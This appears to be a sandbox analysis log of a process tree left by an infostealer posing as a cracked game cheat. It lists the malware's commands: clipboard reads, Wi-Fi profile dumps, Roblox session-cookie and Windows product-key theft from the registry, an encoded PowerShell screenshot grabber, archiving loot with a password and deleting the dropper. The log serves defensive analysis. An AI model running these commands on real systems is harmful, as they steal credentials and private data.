C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:4860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:3464

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:1712

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:4440

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:1104

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
3⤵
PID:4340

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
4⤵
PID:1136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4212

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqsvz0fg\yqsvz0fg.cmdline"
5⤵
PID:1588

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F56.tmp" "c:\Users\Admin\AppData\Local\Temp\yqsvz0fg\CSC69D0ACEBB6FC47C4BF1486B77885F56.TMP"
6⤵
PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4072

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
3⤵
PID:4328

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:1892

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
3⤵
PID:4608

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2720

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:2488

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:760

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2544

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:1228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:3592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:1392

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4860

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:4076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32042\rar.exe a -r -hp"dani" "C:\Users\Admin\AppData\Local\Temp\nSEcE.zip" *"
3⤵
PID:4688

C:\Users\Admin\AppData\Local\Temp\_MEI32042\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI32042\rar.exe a -r -hp"dani" "C:\Users\Admin\AppData\Local\Temp\nSEcE.zip" *
4⤵
- Executes dropped EXE
PID:3052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:1664

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:1032

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:3712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:4480

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:2344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:5116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:2140

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe""
3⤵
PID:384

C:\Windows\system32\PING.EXE
ping localhost -n 3
4⤵
- Runs ping.exe
PID:3532

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8e8d9ab58,0x7ff8e8d9ab68,0x7ff8e8d9ab78
2⤵
PID:4904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:2
2⤵
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:8
2⤵
PID:1584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2300 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:8
2⤵
PID:2328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:1
2⤵
PID:4700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3060 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:1
2⤵
PID:4284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4292 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:1
2⤵
PID:3780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4272 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:8
2⤵
PID:4744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4576 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:8
2⤵
PID:1552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3836 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:8
2⤵
PID:2252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:8
2⤵
PID:5108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4852 --field-trial-handle=1824,i,10872449634872386867,17645103452550512242,131072 /prefetch:8
2⤵
PID:1280

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e8d9ab58,0x7ff8e8d9ab68,0x7ff8e8d9ab78
2⤵
PID:4612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:2
2⤵
PID:3592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:1752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:1196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:3596

C:\Program Files\Google\Chrome\Application\chrome.exe
